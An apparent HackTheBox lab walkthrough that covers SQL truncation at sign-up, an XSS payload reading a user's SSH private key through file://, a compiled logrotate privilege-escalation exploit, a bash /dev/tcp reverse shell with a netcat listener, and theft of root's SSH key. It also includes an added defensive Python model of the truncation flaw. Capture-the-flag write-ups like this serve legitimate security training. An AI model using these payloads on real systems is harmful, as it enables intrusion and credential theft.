HTB Walkthrough Book



After the Nmap scan we see that only 2 ports are open. After poking around, we discover that the sign-up page is vulnerable to an SQL truncation attack.


Once we are logged in to both the admin site and the normal site, we discover an XSS vulnerability. Because of this vulnerability we were able to get the id_rsa key and log in to the box.


After some enumeration we discover a vulnerability in the log rotate application. After exploiting it we were able to take over the machine completely.



nmap -sC -sV -p-


Turns out it's vulnerable to SQL truncation:

Intercepting this request with Burp so we can edit it and use the SQL truncation attack:
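
Why the sign-up check fails under SQL truncation, and the server-side validation that closes it, as an added example that is not part of the original walkthrough or the target application. The column width, the table model and all account values are constructed assumptions.

```python
# Added example: toy model of a MySQL-style VARCHAR column in non-strict mode.
# EMAIL_WIDTH and every account value below are constructed assumptions.
EMAIL_WIDTH = 20


class UserTable:
    def __init__(self):
        self.rows = []  # (email, password) tuples

    def select(self, email):
        # PAD SPACE comparison: trailing spaces are ignored
        key = email.rstrip(" ")
        return [r for r in self.rows if r[0].rstrip(" ") == key]

    def insert(self, email, password):
        # Non-strict mode: over-long values are silently cut to the column width
        self.rows.append((email[:EMAIL_WIDTH], password))


def signup_vulnerable(table, email, password):
    # Uniqueness is checked on the full input, but the stored value is truncated
    if table.select(email):
        return False
    table.insert(email, password)
    return True


def signup_hardened(table, email, password):
    # Normalise, reject what will not fit, and only then check uniqueness
    email = email.strip()
    if not email or len(email) > EMAIL_WIDTH or table.select(email):
        return False
    table.insert(email, password)
    return True


def demo():
    existing = "admin@example.test"
    padded = existing + " " * 5 + "x"  # constructed input, longer than the column
    results = {}
    for name, signup in (("vulnerable", signup_vulnerable), ("hardened", signup_hardened)):
        table = UserTable()
        table.insert(existing, "original-pw")
        accepted = signup(table, padded, "second-pw")
        results[name] = (accepted, len(table.select(existing)))
    return results  # (signup accepted?, rows now matching the existing account)
```

On a real MySQL server the same protection comes from enabling `STRICT_TRANS_TABLES` in `sql_mode` and putting a `UNIQUE` index on the column, so the database rejects the row even if the application check is skipped.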



XSS attack

<script> x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText.fontsize(1)) }; x.open("GET","file:///home/reader/.ssh/id_rsa"); x.send(); </script>

Open the collections

and we get our RSA key:

Note: of course we did some more enumeration with our LFI; that's why we know we need reader as the user.

chmod 600 id_rsa

Privilege Escalation

After some enumeration we found the following vulnerability

Compile the exploit:

gcc -o exploit exploit.c

Create a bash script with a reverse shell:


bash -i >& /dev/tcp/ 0>&1

nc -lvp 443

./exploit -p /home/reader/backups/access.log

To speed things up a bit, I log in with another shell and execute the following command to trigger the log rotation:

echo rotateme >> /home/reader/backups/access.log

The shell was unstable, so since there is an id_rsa key I decided to grab it when the root shell popped up.

chmod 600 root_id

ssh -i root_id root@

Made by s3cwalk

Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.
